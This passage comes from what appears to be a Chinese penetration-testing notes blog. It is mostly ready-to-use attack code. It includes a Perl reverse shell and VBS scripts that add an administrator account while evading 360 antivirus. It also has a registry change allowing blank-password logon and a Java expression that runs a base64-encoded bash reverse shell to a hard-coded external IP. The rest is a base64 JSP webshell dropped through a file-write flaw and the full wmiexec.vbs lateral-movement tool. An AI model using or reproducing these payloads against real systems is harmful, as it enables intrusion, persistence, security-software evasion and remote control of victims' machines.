class="keyword">my</span> $remote_ip = $ARGV[<span class="number">0</span>];</span><br><span class="line"><span class="keyword">my</span> $remote_port = $ARGV[<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">my</span> $proto = <span class="keyword">getprotobyname</span>(<span class="string">&quot;tcp&quot;</span>);</span><br><span class="line"><span class="keyword">my</span> $pack_addr = sockaddr_in($remote_port， inet_aton($remote_ip));</span><br><span class="line"></span><br><span class="line"><span class="keyword">my</span> $shell = <span class="string">&#x27;/bin/bash -i&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">socket</span>(SOCK， AF_INET， SOCK_STREAM， $proto);</span><br><span class="line"></span><br><span class="line">STDOUT-&gt;autoflush(<span class="number">1</span>);</span><br><span class="line">SOCK-&gt;autoflush(<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">connect</span>(SOCK，$pack_addr) <span class="keyword">or</span> <span class="keyword">die</span> <span class="string">&quot;can not connect:$!&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">open</span> STDIN， <span class="string">&quot;&lt;&amp;SOCK&quot;</span>;</span><br><span class="line"><span class="keyword">open</span> STDOUT， <span class="string">&quot;&gt;&amp;SOCK&quot;</span>;</span><br><span class="line"><span class="keyword">open</span> STDERR， <span class="string">&quot;&gt;&amp;SOCK&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">&quot;Enjoy the shell.n&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">system</span>($shell);</span><br><span class="line"><span class="keyword">close</span> SOCK;</span><br><span class="line"></span><br><span class="line"><span class="keyword">exit</span> <span class="number">0</span>;</span><br></pre></td></tr></table></figure>



<h2 id="vbs绕过360添加用户"><a href="#vbs绕过360添加用户" class="headerlink" title="vbs绕过360添加用户"></a>vbs绕过360添加用户</h2><p>2021.6.4 vbs绕过360添加用户并添加至管理员组</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">set wsnetwork&#x3D;CreateObject(&quot;WSCRIPT.NETWORK&quot;)</span><br><span class="line">os&#x3D;&quot;WinNT:&#x2F;&#x2F;&quot;&amp;wsnetwork.ComputerName</span><br><span class="line">Set ob&#x3D;GetObject(os)</span><br><span class="line">Set oe&#x3D;GetObject(os&amp;&quot;&#x2F;Administrators，group&quot;)</span><br><span class="line">Set od&#x3D;ob.Create(&quot;user&quot;，&quot;admin&quot;)</span><br><span class="line">od.SetPassword &quot;123456&quot;</span><br><span class="line">od.SetInfo</span><br><span class="line">Set of&#x3D;GetObject(os&amp;&quot;&#x2F;admin&quot;，user)</span><br><span class="line">oe.add os&amp;&quot;&#x2F;admin&quot;</span><br></pre></td></tr></table></figure>

<p>保存为xx.vps，然后system权限下 wscript.exe xx.vbs 账密 admin 123456</p>
<p>或者</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">struser&#x3D;wscript.arguments(0)</span><br><span class="line">strpass&#x3D;wscript.arguments(1)</span><br><span class="line"></span><br><span class="line">set lp&#x3D;createObject(&quot;WSCRIPT.NETWORK&quot;)</span><br><span class="line">oz&#x3D;&quot;WinNT:&#x2F;&#x2F;&quot;&amp;lp.ComputerName</span><br><span class="line">Set ob&#x3D;GetObject(oz)</span><br><span class="line">Set oe&#x3D;GetObject(oz&amp;&quot;&#x2F;Administrators，group&quot;)</span><br><span class="line">Set od&#x3D;ob.create(&quot;user&quot;，struser)</span><br><span class="line">od.SetPassword strpass</span><br><span class="line">od.SetInfo</span><br><span class="line">Set of&#x3D;GetObject(oz&amp;&quot;&#x2F;&quot; &amp; struser &amp; &quot;，user&quot;)</span><br><span class="line">oe.Add(of.ADsPath)</span><br><span class="line"></span><br><span class="line">For Each admin in oe.Members</span><br><span class="line">if struser&#x3D;admin.Name then</span><br><span class="line">wscript.quit</span><br><span class="line">end if</span><br><span class="line">Next</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>保存为xxx.vps，然后system权限下 wscript.exe xxx.vbs admin 1234567</p>
<p>另外copy net1.exe xxx.txt可以过火绒，过360还是会被提醒</p>
<h2 id="win设置允许空口令登录"><a href="#win设置允许空口令登录" class="headerlink" title="win设置允许空口令登录"></a>win设置允许空口令登录</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add &quot;HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa&quot; &#x2F;v LimitBlankPasswordUse &#x2F;t reg_dword &#x2F;d 0 &#x2F;f</span><br></pre></td></tr></table></figure>



<h2 id="java后台计划任务反弹shell"><a href="#java后台计划任务反弹shell" class="headerlink" title="java后台计划任务反弹shell"></a>java后台计划任务反弹shell</h2><p>一般java后台可能会有计划任务模块，利用该模块反弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">T(java.lang.Runtime).getRuntime().exec(&#39;bash -c &#123;echo，YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTE4LjQuMTg0LzUzIDA+JjEK&#125;|&#123;base64，-d&#125;|&#123;bash，-i&#125;&#39;)</span><br></pre></td></tr></table></figure>

<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220117160338430.png" alt="image-20220117160338430"></p>
<p>其他数据可以参考已有的定时任务，表达式那里参考上面反弹shell的字符，执行就可以反弹shell</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220117160626913.png" alt="image-20220117160626913"></p>
<h2 id="base64写马"><a href="#base64写马" class="headerlink" title="base64写马"></a>base64写马</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;10.20.210.60:8080&#x2F;vulns&#x2F;005-file-write.jsp?filename&#x3D;123.txt&amp;filedata&#x3D;PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYyhrLmdldEJ5dGVzKCksIkFFUyIpKTtuZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwobmV3IHN1bi5taXNjLkJBU0U2NERlY29kZXIoKS5kZWNvZGVCdWZmZXIocmVxdWVzdC5nZXRSZWFkZXIoKS5yZWFkTGluZSgpKSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KTt9JT4&#x3D;</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;10.20.210.60:8080&#x2F;vulns&#x2F;004-command-2.jsp?cmd&#x3D;base64%20-d%20&#x2F;usr&#x2F;local&#x2F;tomcat&#x2F;webapps&#x2F;vulns&#x2F;123.txt%20%3E%20&#x2F;usr&#x2F;local&#x2F;tomcat&#x2F;webapps&#x2F;vulns&#x2F;66.jsp</span><br></pre></td></tr></table></figure>



<h2 id="win上vbs横向"><a href="#win上vbs横向" class="headerlink" title="win上vbs横向"></a>win上vbs横向</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br></pre></td><td class="code"><pre><span class="line">On Error Resume Next</span><br><span class="line">&#39;################################ Temp Result File ， Change it to where you like</span><br><span class="line">Const Path &#x3D; &quot;C:\&quot;</span><br><span class="line">Const FileName &#x3D; &quot;wmi.dll&quot; </span><br><span class="line">Const timeOut &#x3D; 1200</span><br><span class="line">&#39;################################</span><br><span class="line">file &#x3D; Path &amp; &quot;\&quot; &amp; FileName</span><br><span class="line">file &#x3D; Replace(file，&quot;\\&quot;，&quot;\&quot;)</span><br><span class="line">Set fso &#x3D; CreateObject(&quot;Scripting.FileSystemObject&quot;)</span><br><span class="line">FilePath &#x3D; fso.GetParentFolderName(file) &#39;for wmi create share</span><br><span class="line">&#39;WScript.Echo FilePath</span><br><span class="line"></span><br><span class="line">WAITTIME &#x3D; timeOut              &#39;ms  time to execute command ，read result file after 1200ms</span><br><span class="line"></span><br><span class="line">Set objArgs &#x3D; WScript.Arguments</span><br><span class="line">intArgCount &#x3D; objArgs.Count </span><br><span class="line">If intArgCount &lt; 2 Or intArgCount &gt; 5 Then</span><br><span class="line">	WScript.Echo </span><br><span class="line">	WScript.Echo &quot;   $$\      $$\ $$\      $$\ $$$$$$\ $$$$$$$$\ $$\   $$\ $$$$$$$$\  $$$$$$\  &quot;</span><br><span class="line">	WScript.Echo &quot;   $$ | $\  $$ |$$$\    $$$ |\_$$  _|$$  _____|$$ |  $$ |$$  _____|$$  __$$\ &quot;</span><br><span class="line">	WScript.Echo &quot;   $$ |$$$\ $$ |$$$$\  $$$$ |  $$ |  $$ |      \$$\ $$  |$$ |      $$ &#x2F;  \__|&quot;</span><br><span class="line">	WScript.Echo &quot;   $$ $$ $$\$$ |$$\$$\$$ $$ |  $$ |  $$$$$\     \$$$$  &#x2F; $$$$$\    $$ |      &quot;</span><br><span class="line">	WScript.Echo &quot;   $$$$  _$$$$ |$$ \$$$  $$ |  $$ |  $$  __|    $$  $$&lt;  $$  __|   $$ |      &quot;</span><br><span class="line">	WScript.Echo &quot;   $$$  &#x2F; \$$$ |$$ |\$  &#x2F;$$ |  $$ |  $$ |      $$  &#x2F;\$$\ $$ |      $$ |  $$\ &quot;</span><br><span class="line">	WScript.Echo &quot;   $$  &#x2F;   \$$ |$$ | \_&#x2F; $$ |$$$$$$\ $$$$$$$$\ $$ &#x2F;  $$ |$$$$$$$$\ \$$$$$$  |&quot;</span><br><span class="line">	WScript.Echo &quot;   \__&#x2F;     \__|\__|     \__|\______|\________|\__|  \__|\________| \______&#x2F; &quot;</span><br><span class="line">	WScript.Echo &quot;                                               v1.1dev        By. Twi1ight   &quot;</span><br><span class="line">	WScript.Echo &quot; Usage:&quot; &amp; _</span><br><span class="line">					vbTab &amp; &quot;wmiexec.vbs  &#x2F;shell  host&quot; &amp; _</span><br><span class="line">		vbNewLine &amp; vbTab &amp; &quot;wmiexec.vbs  &#x2F;shell  host  user  pass&quot; &amp; _</span><br><span class="line">		vbNewLine &amp; vbTab &amp; &quot;wmiexec.vbs  &#x2F;cmd  host  command&quot; &amp; _</span><br><span class="line">		vbNewLine &amp; vbTab &amp; &quot;wmiexec.vbs  &#x2F;cmd  host  user  pass  command&quot; &amp; vbNewLine &amp; _</span><br><span class="line">		vbNewLine &amp; vbTab &amp; &quot;  &#x2F;shell&quot;  &amp; vbTab &amp; &quot;half-interactive shell mode&quot; &amp; _</span><br><span class="line">		vbNewLine &amp; vbTab &amp; &quot;  &#x2F;cmd&quot; &amp; vbTab &amp; vbTab &amp; &quot;single command mode&quot; &amp; _</span><br><span class="line">		vbNewLine &amp; vbTab &amp; &quot;  host&quot; &amp; vbTab &amp; vbTab &amp; &quot;hostname or IP address&quot; &amp; _</span><br><span class="line">		vbNewLine &amp; vbTab &amp; &quot;  command&quot; &amp; vbTab &amp; &quot;the command to execute on remote host&quot; &amp; _</span><br><span class="line">		vbNewLine &amp; vbNewLine &amp; vbTab &amp; &quot;  -waitTIME&quot; &amp; vbTab &amp; _</span><br><span class="line">		 &quot;[both mode] ，delay TIME to read result，&quot;&amp; vbNewLine &amp; vbTab &amp; _</span><br><span class="line">		 vbTab &amp; vbTab &amp;&quot;eg. &#39;systeminfo -wait5000&#39; &#39;ping google.com -wait2000&#39;&quot; &amp; _</span><br><span class="line">		vbNewLine &amp; vbTab &amp; &quot;  -persist&quot; &amp; vbTab &amp; _</span><br><span class="line">		 &quot;[both mode] ，running command background and persistent&quot; &amp; vbNewLine &amp; vbTab &amp; _</span><br><span class="line">		 vbTab &amp; vbTab &amp;&quot;such as nc.exe or Trojan&quot; </span><br><span class="line">	WScript.Quit()</span><br><span class="line">End If</span><br><span class="line"></span><br><span class="line">If LCase(objArgs.Item(0)) &lt;&gt; &quot;&#x2F;cmd&quot; And LCase(objArgs.Item(0)) &lt;&gt; &quot;&#x2F;shell&quot; Then </span><br><span class="line">	WScript.Echo &quot;WMIEXEC ERROR: Wrong Mode Specified!&quot;</span><br><span class="line">	WScript.Quit</span><br><span class="line">End If</span><br><span class="line">boolShellMode &#x3D; True</span><br><span class="line">If LCase(objArgs.Item(0)) &#x3D; &quot;&#x2F;cmd&quot; Then boolShellMode &#x3D; False</span><br><span class="line">If boolShellMode &#x3D; False Then command &#x3D; objArgs.Item(intArgCount - 1)</span><br><span class="line"></span><br><span class="line">host &#x3D; objArgs.Item(1)</span><br><span class="line">If intArgCount &gt; 3 Then </span><br><span class="line">	user &#x3D; objArgs.Item(2)</span><br><span class="line">	pass &#x3D; objArgs.Item(3)</span><br><span class="line">	Set objShell &#x3D; CreateObject(&quot;WScript.Shell&quot;)</span><br><span class="line">	strNetUse &#x3D; &quot;cmd.exe &#x2F;c net use \\&quot; &amp; host &amp; &quot; &quot;&quot;&quot; &amp; pass &amp; &quot;&quot;&quot; &quot; &amp; &quot;&#x2F;user:&quot; &amp; user</span><br><span class="line">	&#39;WScript.Echo strNetUse</span><br><span class="line">	objShell.Run strNetUse，0</span><br><span class="line">End If</span><br><span class="line">&#39;Output Status</span><br><span class="line">WScript.Echo &quot;WMIEXEC : Target -&gt; &quot; &amp; host</span><br><span class="line">WScript.Echo &quot;WMIEXEC : Connecting...&quot;</span><br><span class="line"></span><br><span class="line">Set objLocator &#x3D; CreateObject(&quot;wbemscripting.swbemlocator&quot;)</span><br><span class="line">If intArgCount &gt;2 Then</span><br><span class="line">	set objWMIService &#x3D; objLocator.connectserver(host，&quot;root&#x2F;cimv2&quot;，user，pass)</span><br><span class="line">Else</span><br><span class="line">	Set objWMIService &#x3D; objLocator.ConnectServer(host，&quot;root&#x2F;cimv2&quot;)</span><br><span class="line">End If</span><br><span class="line">If Err.Number &lt;&gt; 0 Then</span><br><span class="line">	WScript.Echo &quot;WMIEXEC ERROR: &quot; &amp; Err.Description </span><br><span class="line">	WScript.Quit</span><br><span class="line">End If</span><br><span class="line">WScript.Echo &quot;WMIEXEC : Login -&gt; OK&quot;</span><br><span class="line">WScript.Echo &quot;WMIEXEC : Result File -&gt; &quot; &amp; file</span><br><span class="line"></span><br><span class="line">boolPersist &#x3D; False</span><br><span class="line">&#39;Create Share</span><br><span class="line">CreateShare()</span><br><span class="line">CurrentFolder &#x3D; Null</span><br><span class="line">&#39;-----single Command mode------</span><br><span class="line">If boolShellMode &#x3D; False Then</span><br><span class="line">	WAITTIME &#x3D; 5000</span><br><span class="line">	WScript.Echo vbNewLine &amp; vbTab &amp; host &amp; &quot;  &gt;&gt;  &quot; &amp; command</span><br><span class="line">	boolGetFolder &#x3D; False</span><br><span class="line">	strResult &#x3D; PhraseCmd( command )</span><br><span class="line">	&#39;WScript.Echo strResult</span><br><span class="line">	If strResult &#x3D; &quot;persist&quot; Then</span><br><span class="line">		boolPersist &#x3D; True</span><br><span class="line">		Exec command，&quot;nul&quot;</span><br><span class="line">	Else</span><br><span class="line">		Exec command， file</span><br><span class="line">		ReadResult()</span><br><span class="line">	End If</span><br><span class="line">	If intArgCount &gt; 3 Then </span><br><span class="line">		Set objShell &#x3D; CreateObject(&quot;WScript.Shell&quot;)</span><br><span class="line">		strNetUse &#x3D; &quot;cmd.exe &#x2F;c net use \\&quot; &amp; host &amp; &quot; &#x2F;del&quot;</span><br><span class="line">		objShell.Run strNetUse，0</span><br><span class="line">	End If</span><br><span class="line">	DeleteShare()</span><br><span class="line">	WScript.Quit</span><br><span class="line">End If</span><br><span class="line">&#39;------------------------------</span><br><span class="line"></span><br><span class="line">&#39;++++++++shell mode++++++++++++</span><br><span class="line">&#39;get current working directory</span><br><span class="line">boolGetFolder &#x3D; True</span><br><span class="line">CurrentFolder &#x3D; Exec(&quot;cd&quot;， file)</span><br><span class="line"></span><br><span class="line">&#39;WScript.Echo CurrentFolder</span><br><span class="line">Do While True</span><br><span class="line">	boolPersist &#x3D; False</span><br><span class="line">	WAITTIME &#x3D; timeOut</span><br><span class="line">	wscript.stdout.write(CurrentFolder &amp; &quot;&gt;&quot;)</span><br><span class="line">	command &#x3D; wscript.stdin.ReadLine</span><br><span class="line">	&#39;press &#39;Enter&#39; directorly</span><br><span class="line">	Do While command &#x3D; &quot;&quot;</span><br><span class="line">		wscript.stdout.write(CurrentFolder &amp; &quot;&gt;&quot;)</span><br><span class="line">		command &#x3D; wscript.stdin.ReadLine</span><br><span class="line">	Loop</span><br><span class="line">	If LCase(Trim(command)) &#x3D; &quot;exit&quot; Then Exit Do</span><br><span class="line">	&#39;If Not IsEmpty(command) Then </span><br><span class="line">	&#39;process &#39;cd&#39; command--------&gt;&gt;&gt;&gt;</span><br><span class="line">	strResult &#x3D; PhraseCmd( command )</span><br><span class="line">	If strResult &#x3D; &quot;cd&quot; Then </span><br><span class="line">		command &#x3D; command &amp; &quot; &amp; cd &quot;</span><br><span class="line">		boolGetFolder &#x3D; True</span><br><span class="line">		DestFolder &#x3D; Exec(command， file)</span><br><span class="line">		If CurrentFolder &#x3D; DestFolder Then </span><br><span class="line">			WScript.Echo &quot;The system cannot find the path specified.&quot;</span><br><span class="line">		Else</span><br><span class="line">			CurrentFolder &#x3D; DestFolder</span><br><span class="line">		End If</span><br><span class="line">	ElseIf strResult &#x3D; &quot;persist&quot; Then</span><br><span class="line">		boolPersist &#x3D; True</span><br><span class="line">		&#39;WScript.Echo &quot;persist&quot;</span><br><span class="line">		Exec command，&quot;nul&quot;</span><br><span class="line">		&#39;##########################################toDo</span><br><span class="line">	&#39;-----------&lt;&lt;&lt;&lt;</span><br><span class="line">	Else</span><br><span class="line">		On Error Resume Next</span><br><span class="line">		err.clear</span><br><span class="line">		Exec command， file</span><br><span class="line">		ReadResult()</span><br><span class="line">	    If err.number &lt;&gt; 0 Then wscript.echo( &quot;WMIEXEC ERROR: &quot; &amp; Err.Number &amp; &quot; &quot; &amp; err.description)</span><br><span class="line">		Err.Clear</span><br><span class="line">	    On Error Goto 0</span><br><span class="line">	End If</span><br><span class="line">loop</span><br><span class="line"></span><br><span class="line">strDelFile &#x3D; &quot;del &quot; &amp; file &amp; &quot; &#x2F;F&quot;</span><br><span class="line">Exec strDelFile，&quot;nul&quot;</span><br><span class="line">If intArgCount &gt; 3 Then </span><br><span class="line">	Set objShell &#x3D; CreateObject(&quot;WScript.Shell&quot;)</span><br><span class="line">	strNetUse &#x3D; &quot;cmd.exe &#x2F;c net use \\&quot; &amp; host &amp; &quot; &#x2F;del&quot;</span><br><span class="line">	objShell.Run strNetUse，0</span><br><span class="line">End If</span><br><span class="line">DeleteShare()</span><br><span class="line"></span><br><span class="line">&#39;#####################################</span><br><span class="line">Function PhraseCmd(cmd)</span><br><span class="line">	PhraseCmd &#x3D; False &#39; not &#39;cd&#39;</span><br><span class="line">	arrCommand &#x3D; Split(cmd)</span><br><span class="line">	strExe &#x3D; arrCommand(0)</span><br><span class="line">	If LCase(Trim(strExe)) &#x3D; &quot;cd&quot; Or LCase(Trim(strExe)) &#x3D; &quot;cd.exe&quot; Then PhraseCmd &#x3D; &quot;cd&quot;  &#39; is &#39;cd&#39;</span><br><span class="line">	Set regEx &#x3D; New RegExp</span><br><span class="line">	regEx.Pattern &#x3D; &quot;^[a-z]:$&quot;</span><br><span class="line">	regEx.IgnoreCase &#x3D; True</span><br><span class="line">	Set Matches &#x3D; regEx.Execute(cmd)</span><br><span class="line">	If Matches.Count &lt;&gt; 0 Then PhraseCmd &#x3D; &quot;cd&quot; &#39; is &#39;d:&#39;</span><br><span class="line">	&#39;phrase time command</span><br><span class="line">	regEx.Pattern &#x3D; &quot;(.*?)-wait(\d+)&quot;</span><br><span class="line">	regEx.IgnoreCase &#x3D; True</span><br><span class="line">	Set Matches &#x3D; regEx.Execute(cmd)</span><br><span class="line">	If Matches.Count &lt;&gt; 0 Then </span><br><span class="line">		Set objMatch &#x3D; Matches(0)</span><br><span class="line">		command &#x3D; objMatch.SubMatches(0)</span><br><span class="line">		&#39;WScript.Echo &quot;Command :&quot; &amp; command</span><br><span class="line">		WAITTIME &#x3D; CInt(objMatch.SubMatches(1))</span><br><span class="line">		WScript.Echo &quot;WMIEXEC : Waiting &quot; &amp; WAITTIME &amp; &quot; ms...&quot; &amp; vbNewLine</span><br><span class="line">	End If</span><br><span class="line">	&#39;phrase persist command</span><br><span class="line">	regEx.Pattern &#x3D; &quot;(.*?)-persist&quot;</span><br><span class="line">	regEx.IgnoreCase &#x3D; True</span><br><span class="line">	Set Matches &#x3D; regEx.Execute(cmd)</span><br><span class="line">	If Matches.Count &lt;&gt; 0 Then </span><br><span class="line">		Set objMatch &#x3D; Matches(0)</span><br><span class="line">		command &#x3D; objMatch.SubMatches(0)</span><br><span class="line">		PhraseCmd &#x3D; &quot;persist&quot;  &#39; is quiet</span><br><span class="line">	End If</span><br><span class="line">End Function</span><br><span class="line"></span><br><span class="line">Function CreateShare()</span><br><span class="line">	&#39;create share</span><br><span class="line">	Set objNewShare &#x3D; objWMIService.Get(&quot;Win32_Share&quot;)</span><br><span class="line">	intReturn &#x3D; objNewShare.Create _</span><br><span class="line">	    (FilePath， &quot;WMI_SHARE&quot;， 0， 25， &quot;&quot;)</span><br><span class="line">	If intReturn &lt;&gt; 0 Then</span><br><span class="line">		WScript.Echo &quot;WMIEXEC ERROR: Share could not be created.&quot; &amp; _</span><br><span class="line">	        vbNewLine &amp; &quot;WMIEXEC ERROR: Return value -&gt; &quot; &amp; intReturn</span><br><span class="line">	    Select Case intReturn</span><br><span class="line">	    	Case 2</span><br><span class="line">	    		WScript.Echo &quot;WMIEXEC ERROR: Access Denied!&quot;</span><br><span class="line">	    	Case 9</span><br><span class="line">	